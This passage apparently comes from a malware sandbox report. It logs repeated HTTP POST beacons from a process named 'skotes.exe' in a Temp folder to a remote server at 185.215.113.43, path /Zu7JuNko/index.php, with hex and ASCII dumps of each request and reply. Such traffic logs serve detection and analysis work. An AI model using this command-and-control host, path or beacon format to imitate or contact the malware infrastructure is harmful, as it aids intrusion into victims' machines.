                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          72192.168.2.450150185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:58.177144051 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:59.522814035 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:59 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          73192.168.2.450151185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:01.150619984 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:02.600435019 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:02 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          74192.168.2.450152185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:04.357266903 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:05.702673912 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          75192.168.2.450153185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:07.337337017 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:08.693867922 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:08 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          76192.168.2.450154185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:10.721298933 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:12.082817078 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:11 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          77192.168.2.450155185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:13.712444067 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:15.066869974 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          78192.168.2.450156185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:16.821506977 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:18.154069901 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          79192.168.2.450157185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:19.791109085 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:21.198635101 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          80192.168.2.450158185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:22.948471069 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:24.322676897 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          81192.168.2.450159185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:25.962557077 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:27.360534906 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:27 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          82192.168.2.450160185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:29.120309114 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:30.456123114 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:30 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          83192.168.2.450161185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:32.088109970 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:33.425512075 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:33 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          84192.168.2.450162185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:35.180608034 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:36.512608051 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:36 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          85192.168.2.450163185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:38.149893045 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:39.657422066 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:39 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          86192.168.2.450164185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:41.400818110 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          87192.168.2.450165185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:43.370206118 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:44.756974936 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:44 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          88192.168.2.450166185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:46.509432077 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
